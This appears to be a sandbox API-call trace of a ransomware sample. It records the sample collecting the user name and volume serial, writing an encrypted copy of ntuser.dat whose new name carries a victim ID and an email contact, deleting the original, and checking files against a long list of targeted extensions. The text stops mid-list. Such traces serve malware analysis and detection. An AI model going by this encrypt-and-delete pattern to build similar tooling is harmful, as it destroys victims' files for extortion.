	[0179.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.376] CryptReleaseContext (hProv=0xfcb220, dwFlags=0x0) returned 1
	[0179.376] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.377] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18c938, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18c938*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.377] GetUserNameA (in: lpBuffer=0x18c81c, pcbBuffer=0x18c934 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18c934) returned 1
	[0179.379] wsprintfW (in: param_1=0x18c950, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\default\\ntuser.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 69
	[0179.379] CreateFileW (lpFileName="c:\\users\\default\\ntuser.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\default\\ntuser.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.379] WriteFile (in: hFile=0x384, lpBuffer=0x101d188*, nNumberOfBytesToWrite=0x40010, lpNumberOfBytesWritten=0x18cd78, lpOverlapped=0x0 | out: lpBuffer=0x101d188*, lpNumberOfBytesWritten=0x18cd78*=0x40010, lpOverlapped=0x0) returned 1
	[0179.402] CloseHandle (hObject=0x384) returned 1
	[0179.403] CloseHandle (hObject=0x380) returned 1
	[0179.403] DeleteFileW (lpFileName="c:\\users\\default\\ntuser.dat" (normalized: "c:\\users\\default\\ntuser.dat")) returned 1
	[0179.425] DeleteFileW (lpFileName="c:\\users\\default\\ntuser.dat" (normalized: "c:\\users\\default\\ntuser.dat")) returned 0
	[0179.425] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1
	[0179.425] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1
	[0179.425] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1
	[0179.425] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.425] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG1" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned="C:\\Users\\Default\\NTUSER.DAT.LOG1"
	[0179.425] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32
	[0179.426] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.426] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\NTUSER.DAT.LOG1", cchLength=0x20 | out: lpsz="c:\\users\\default\\ntuser.dat.log1") returned 0x20
	[0179.426] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.426] StrStrW (lpFirst="c:\\users\\default\\ntuser.dat.log1", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.426] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\default\\ntuser.dat.log1" | out: lpString1="c:\\users\\default\\ntuser.dat.log1") returned="c:\\users\\default\\ntuser.dat.log1"
	[0179.426] lstrlenW (lpString="c:\\users\\default\\ntuser.dat.log1") returned 32
	[0179.426] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.427] StrStrW (lpFirst=".log1", lpSrch=".") returned=".log1"
	[0179.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.427] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".log1") returned 0x0
	[0179.427] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1
	[0179.427] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1
	[0179.427] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1
	[0179.428] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.428] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG2" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned="C:\\Users\\Default\\NTUSER.DAT.LOG2"
	[0179.428] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32
	[0179.428] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.428] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\NTUSER.DAT.LOG2", cchLength=0x20 | out: lpsz="c:\\users\\default\\ntuser.dat.log2") returned 0x20
	[0179.428] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.428] StrStrW (lpFirst="c:\\users\\default\\ntuser.dat.log2", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.428] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\default\\ntuser.dat.log2" | out: lpString1="c:\\users\\default\\ntuser.dat.log2") returned="c:\\users\\default\\ntuser.dat.log2"
	[0179.429] lstrlenW (lpString="c:\\users\\default\\ntuser.dat.log2") returned 32
	[0179.429] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.429] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.429] StrStrW (lpFirst=".log2", lpSrch=".") returned=".log2"
	[0179.429] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.429] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".log2") returned 0x0
	[0179.430] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1
	[0179.430] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", lpString2="..") returned 1
	[0179.430] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", lpString2=".") returned 1
	[0179.430] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.430] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf"
	[0179.430] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned 72
	[0179.430] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.430] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cchLength=0x48 | out: lpsz="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf") returned 0x48
	[0179.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.431] StrStrW (lpFirst="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.431] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf" | out: lpString1="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf") returned="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf"
	[0179.431] lstrlenW (lpString="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf") returned 72
	[0179.431] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.431] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.431] StrStrW (lpFirst=".blf", lpSrch=".") returned=".blf"
	[0179.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.432] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.